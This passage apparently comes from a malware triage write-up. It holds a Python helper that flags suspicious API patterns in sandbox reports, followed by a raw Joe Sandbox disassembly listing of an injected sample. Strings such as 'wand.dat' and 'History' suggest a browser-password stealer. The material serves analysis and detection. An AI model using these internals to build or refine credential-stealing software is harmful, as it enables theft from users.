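REG_ENUM = {"RegEnumValueW", "RegEnumValueA", "RegEnumKeyExW", "RegEnumKeyExA"}


def triage(record):
    """Return human-readable flags for the patterns seen in the records above."""
    names = {c["name"] for c in record["apis"]}
    flags = []
    if names & LOADERS and "GetProcAddress" in names:
        n = sum(1 for c in record["apis"] if c["name"] == "GetProcAddress")
        flags.append(f"dynamic API resolution: LoadLibrary + {n}x GetProcAddress "
                     f"(string: {record['meta'].get('String ID') or '-'})")
    if names & REG_ENUM:
        keys = [a for c in record["apis"] for a in c["args"] if "\\" in a]
        flags.append("registry enumeration: " + ", ".join(keys or ["key not resolved"]))
    for c in record["apis"]:
        if c["name"] in ("CreateFileW", "CreateFileA"):
            d = decode_create_file(c)
            flags.append(f"CreateFile @{c['ref']}: {d['access']} / {d['disposition']}")
    return flags


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_REPORT), 1):
        print(f"record {i}: {len(rec['apis'])} API calls, fuzzy={rec['meta'][END_KEY][:16]}...")
        for flag in triage(rec):
            print("   -", flag)
```

Run against a full report export, the `API ID` and `Instruction Fuzzy Hash` fields collected this way can be keyed per record to compare the dump with other samples, and the `CreateFile` decoder makes the `40000000`/`00000002` arguments of the `General` record read as GENERIC_WRITE with CREATE_ALWAYS, a config file being (re)written rather than read.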
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastMessage_snwprintf
                    • String ID: Error$Error %d: %s
                    • API String ID: 313946961-1552265934
                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: foreign key constraint failed$new$oid$old
                    • API String ID: 0-1953309616
                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                    APIs
                    Strings
                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                    • API String ID: 3510742995-272990098
                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: gj
                    • API String ID: 1297977491-4203073231
                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                    APIs
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 00417497
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                    • malloc.MSVCRT ref: 004174BD
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                    • String ID:
                    • API String ID: 2903831945-0
                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                    APIs
                    • GetParent.USER32(?), ref: 0040D453
                    • GetWindowRect.USER32(?,?), ref: 0040D460
                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Rect$ClientParentPoints
                    • String ID:
                    • API String ID: 4247780290-0
                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • memset.MSVCRT ref: 004450CD
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                      • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                    • String ID:
                    • API String ID: 1471605966-0
                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                    APIs
                    • wcscpy.MSVCRT ref: 0044475F
                    • wcscat.MSVCRT ref: 0044476E
                    • wcscat.MSVCRT ref: 0044477F
                    • wcscat.MSVCRT ref: 0044478E
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                    • String ID: \StringFileInfo\
                    • API String ID: 102104167-2245444037
                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$??3@
                    • String ID: g4@
                    • API String ID: 3314356048-2133833424
                    Similarity
                    • API ID: _memicmpwcslen
                    • String ID: @@@@$History
                    • API String ID: 1872909662-685208920
                    APIs
                    • memset.MSVCRT ref: 004100FB
                    • memset.MSVCRT ref: 00410112
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 00410141
                    Similarity
                    • API ID: memset$_snwprintf_wcslwrwcscpy
                    • String ID: </%s>
                    • API String ID: 3400436232-259020660
                    APIs
                    • memset.MSVCRT ref: 0040D58D
                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                    Similarity
                    • API ID: ChildEnumTextWindowWindowsmemset
                    • String ID: caption
                    • API String ID: 1523050162-4135340389
                    APIs
                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                    • String ID: MS Sans Serif
                    • API String ID: 210187428-168460110
                    Similarity
                    • API ID: ClassName_wcsicmpmemset
                    • String ID: edit
                    • API String ID: 2747424523-2167791130
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                    Similarity
                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                    • String ID: SHAutoComplete$shlwapi.dll
                    • API String ID: 3150196962-1506664499
                    Similarity
                    • API ID: memcpy$memcmp
                    • String ID:
                    • API String ID: 3384217055-0
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    APIs
                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                    • GetMenu.USER32(?), ref: 00410F8D
                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                    Similarity
                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                    • String ID:
                    • API String ID: 1889144086-0
                    APIs
                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                    • GetLastError.KERNEL32 ref: 0041810A
                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                    Similarity
                    • API ID: File$CloseCreateErrorHandleLastMappingView
                    • String ID:
                    • API String ID: 1661045500-0
                    APIs
                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                    • memcpy.MSVCRT ref: 0042EC7A
                    Strings
                    • Cannot add a column to a view, xrefs: 0042EBE8
                    • virtual tables may not be altered, xrefs: 0042EBD2
                    • sqlite_altertab_%s, xrefs: 0042EC4C
                    Similarity
                    • API ID: memcpymemset
                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                    • API String ID: 1297977491-2063813899
                    APIs
                    • memset.MSVCRT ref: 0040560C
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.*$dat$wand.dat
                    • API String ID: 2618321458-1828844352
                    APIs
                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                    • wcslen.MSVCRT ref: 00410C74
                    • _wtoi.MSVCRT ref: 00410C80
                    • _wcsicmp.MSVCRT ref: 00410CCE
                    • _wcsicmp.MSVCRT ref: 00410CDF
                    Similarity
                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                    • String ID:
                    • API String ID: 1549203181-0
                    APIs
                    • memset.MSVCRT ref: 00412057
                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                    • GetKeyState.USER32(00000010), ref: 0041210D
                    Similarity
                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                    • String ID:
                    • API String ID: 3550944819-0
                    APIs
                    • wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • memcpy.MSVCRT ref: 0040A94F
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
                    APIs
                    • wcslen.MSVCRT ref: 0040B1DE
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                    • memcpy.MSVCRT ref: 0040B248
                    Similarity
                    • API ID: ??3@$memcpy$mallocwcslen
                    • String ID:
                    • API String ID: 3023356884-0
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    Similarity
                    • API ID: ??2@??3@memcpymemset
                    • String ID:
                    • API String ID: 1865533344-0
                    APIs
                    • strlen.MSVCRT ref: 0040B0D8
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                    • memcpy.MSVCRT ref: 0040B159
                    Similarity
                    • API ID: ??3@$memcpy$mallocstrlen
                    • String ID:
                    • API String ID: 1171893557-0
                    APIs
                    • memset.MSVCRT ref: 004144E7
                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                    • memset.MSVCRT ref: 0041451A
                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                    Similarity
                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                    • String ID:
                    • API String ID: 1127616056-0
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: sqlite_master
                    • API String ID: 438689982-3163232059
                    APIs
                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                    • wcscpy.MSVCRT ref: 00414DF3
                    Similarity
                    • API ID: BrowseFolderFromListMallocPathwcscpy
                    • String ID:
                    • API String ID: 3917621476-0
                    APIs
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • _snwprintf.MSVCRT ref: 00410FE1
                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • _snwprintf.MSVCRT ref: 0041100C
                    • wcscat.MSVCRT ref: 0041101F
                    Similarity
                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                    • String ID:
                    • API String ID: 822687973-0
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                    • malloc.MSVCRT ref: 00417459
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                    • RegisterClassW.USER32(?), ref: 00412428
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule$ClassCreateRegisterWindow
                    • String ID:
                    • API String ID: 2678498856-0
                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00409B40
                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$Item
                    • String ID:
                    • API String ID: 3888421826-0
                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                    APIs
                    • memset.MSVCRT ref: 00417B7B
                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                    • GetLastError.KERNEL32 ref: 00417BB5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$ErrorLastLockUnlockmemset
                    • String ID:
                    • API String ID: 3727323765-0
                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                    • malloc.MSVCRT ref: 00417407
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$??3@malloc
                    • String ID:
                    • API String ID: 4284152360-0
                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                    APIs
                    • memset.MSVCRT ref: 0040F673
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                    • strlen.MSVCRT ref: 0040F6A2
                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
